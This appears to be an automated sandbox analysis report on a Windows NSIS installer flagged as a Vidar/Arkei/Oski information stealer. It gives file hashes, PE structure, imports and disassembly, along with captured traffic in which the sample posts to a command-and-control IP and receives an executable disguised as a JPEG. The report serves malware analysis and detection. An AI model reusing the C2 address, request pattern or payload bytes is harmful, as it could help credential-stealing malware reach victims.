SHA-512:	90E89E34596299BF98F4C00DCE0E9CF619AB9CD429B905CA4DE5C3E5E52CC8BA0A7C73495708F1972818614CE70204D8AA7EE834834AB698B8008ECD2D46A013
Malicious:	false
Preview:	..!..w....urq.G..)q.B)5g.)q.B)5g.G...g.....G...W0.W,.g.l.....g..w..W0.W,.g.l.....g.w..W0.W,.g.l.....g.w..W0.W,.g.l....g..w._,(R.N$tM.%%g0..g..w.g,..(..g.o.g.o.(...N,s..g.%w.(.g.qr.G...N......(.'..G..W.s.W.~.W..t.W..s.W.y.W.z..X,Ad.0.Ad.p.<...W..W..~.g$)'.g.%G.......h.(....(./.G.zy.g.yz}....0.w..kk)q.B)5g.g$...g0U<.g$..o,.8..w.h.(.g.g$....o$..g.w....0.D2..Y.T&...J&...8.DB..Y.B&...&...$.D/..Y.x&...n&...$.w....)q.B)5g..g.,...g..g._..X2.g....g...g.g.d.g....8'...Xb.g$.N$sM..h/..x/..g.N$s...h/..x/.N&N$tM..h'.lDB..Y.....l.....g..).g.l.W$.n...g._..X".G...!.g.....g....(.w....)q.B)5g..g.....g..g._..X2.g....g...g.g.d.g....E(...).....g$.N$sM..h/..x/.g0.N$s...h/..x/.g,.N$s...h/..x/.g8..N$~M.%.h7..p7.g.N$s..&.h/..x/.N'N$tM..h'.lD2..Y.....l.....g._4.X$.g.o4...1.W4.W8.W,.W0.W$.....g._..X".G...!.g.....g....8.w...@.g.,...g.g._..X2.g....g...g.g.d.g....N%...Xb.g$.N$sM..h/.x/.g0.N$s...h/.x/.N&N$tM..h'.lD/..Y.....l.....g..*.W

C:\Users\user\AppData\Local\Temp\nsy255F.tmp\qhvek.dll Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	6.140728571148
Encrypted:	false
SSDEEP:	6144:/zWhG0Nnp5uNQzRjAsxH0bKUj/48BuGpHhAYq:/D04NQ9v6bj1rxyYq
MD5:	E1821B88AE16DB674B9A0D7E3C1EABEB
SHA1:	966B2FD636A330B3812C8AAE9CE7A12D98E105B7
SHA-256:	B570A242266192CDB433F2AF8E5FC2B54368DCF6F2F385DFD836032403EF4520
SHA-512:	C514CA0D44C63C03B6AC34E66005CBF80E5F09CD511C7FBE11FF176720AD45BFE9D2809132F6ECD0251BB22E06E6D9E19361960913707DC958EAE5F115ED22F6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4..H4..H4..H9.wH,..H9.IH;..H9.vHQ..H .I%..H4..HX..Hb.I5..Hb.I5..Hb.iH5..Hb.I5..HRich4..H................PE..L....5.a...........!................]j....................................................@..........................S..0...0T......................................TM..............................pM..@............................................text............................... ..`.rdata...M.......N..................@..@.data... /...`.......L..............@....rsrc................^..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.949310845417572
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gunzipped.exe
File size:	421112
MD5:	c2301b62539adcba29dcf6a3200bd017
SHA1:	fd80f7e8e32661d5ec12e7a901f22a9ed82e17a7
SHA256:	c30ce79d7b5b0708dc03f1532fa89afd4efd732531cb557dc31fe63acd5bc1ce
SHA512:	80fef672e7f48640c585f12408025ea06c67344551bb4638e10120ceb30da7e888b18a52aabd209186315c1476da905afe15d5cb68a7d7e266954de16e813037
SSDEEP:	12288:FbLApCXc5WI7RV5f74tODdFI/ik2z9DNaGMrB7uu:F4vWIZf74tOCipuG+Bqu
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.H............,...........9...!......../......e.......Rich............PE..L......H.................Z....9......0.......p....@

File Icon


Icon Hash:	c4c6a2a6a4bcacd4

Static PE Info

General
Entrypoint:	0x4030c7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48EFCDB9 [Fri Oct 10 21:48:41 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7fa974366048f9c551ef45714595665e

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409158h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B0h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [007A2758h], eax
call 00007FBDDD060248h
mov dword ptr [007A26A4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0079DC60h
call dword ptr [00407158h]
push 0040914Ch
push 007A1EA0h
call 00007FBDDD05FEFFh
call dword ptr [004070ACh]
mov edi, 007A8000h
push eax
push edi
call 00007FBDDD05FEEDh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [007A8000h], 00000022h
mov dword ptr [007A26A0h], eax
mov eax, edi
jne 00007FBDDD05D72Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 007A8001h
push dword ptr [esp+14h]
push eax
call 00007FBDDD05F9E0h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007FBDDD05D785h
cmp cl, 00000020h
jne 00007FBDDD05D728h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FBDDD05D71Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3ab000	0x22c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5948	0x5a00	False	0.680815972222	data	6.50601815411	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	False	0.444010416667	data	5.17644153669	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x399798	0x400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x3a3000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3ab000	0x22c0	0x2400	False	0.494357638889	data	5.46008604688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3ab190	0x1ca8	data	English	United States
RT_DIALOG	0x3ace38	0x100	data	English	United States
RT_DIALOG	0x3acf38	0x11c	data	English	United States
RT_DIALOG	0x3ad058	0x60	data	English	United States
RT_GROUP_ICON	0x3ad0b8	0x14	data	English	United States
RT_MANIFEST	0x3ad0d0	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/06/22-07:57:27.666803	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49707	80	192.168.2.3	2.56.57.108
01/06/22-07:57:28.007560	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49707	80	192.168.2.3	2.56.57.108
01/06/22-07:57:28.963117	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49707	80	192.168.2.3	2.56.57.108
01/06/22-07:57:29.467392	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49707	80	192.168.2.3	2.56.57.108
01/06/22-07:57:29.806976	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49707	80	192.168.2.3	2.56.57.108
01/06/22-07:57:30.285328	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49707	80	192.168.2.3	2.56.57.108
01/06/22-07:57:31.348520	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49707	80	192.168.2.3	2.56.57.108
01/06/22-07:57:33.324928	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49707	80	192.168.2.3	2.56.57.108
01/06/22-07:57:34.357929	TCP	2034813	ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern	49707	80	192.168.2.3	2.56.57.108

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2022 07:57:27.639385939 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.666106939 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.666213989 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.666802883 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.697356939 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.697417021 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.697452068 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.697453976 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.697483063 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.697493076 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.697508097 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.697534084 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.697565079 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.697571039 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.697575092 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.697611094 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.697649956 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.697657108 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.697688103 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.697691917 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.697726011 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.697726965 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.697772026 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.724838018 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.724890947 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.724914074 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.724939108 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.724963903 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.724972963 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.724987984 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725002050 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725013018 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725014925 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725037098 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725061893 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725065947 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725076914 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725085974 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725109100 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725110054 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725131989 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725133896 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725151062 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725158930 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725182056 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725194931 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725205898 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725215912 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725229979 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725255013 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725259066 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725277901 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725279093 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725301981 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725302935 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725313902 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725326061 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.725334883 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.725372076 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756491899 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756530046 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756556034 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756556034 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756581068 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756583929 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756603003 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756613016 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756623030 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756639004 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756665945 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756669044 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756683111 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756692886 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756720066 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756722927 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756731987 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756747961 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756767035 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756772995 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756782055 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756799936 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756810904 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756828070 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756882906 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756910086 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756911993 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756931067 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756942034 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756957054 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756969929 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.756983042 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.756997108 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.757024050 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.757041931 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.757050991 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.757072926 CET	49707	80	192.168.2.3	2.56.57.108
Jan 6, 2022 07:57:27.757076979 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.757103920 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.757131100 CET	80	49707	2.56.57.108	192.168.2.3
Jan 6, 2022 07:57:27.757157087 CET	80	49707	2.56.57.108	192.168.2.3

HTTP Request Dependency Graph

2.56.57.108

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49707	2.56.57.108	80	C:\Users\user\Desktop\gunzipped.exe

Timestamp	kBytes transferred	Direction	Data
Jan 6, 2022 07:57:27.666802883 CET	566	OUT	POST /osk//6.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Jan 6, 2022 07:57:27.697356939 CET	567	IN	HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:27 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT ETag: "235d0-58a9fc6206c00" Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
Jan 6, 2022 07:57:28.007560015 CET	718	OUT	POST /osk//1.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 2.56.57.108 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
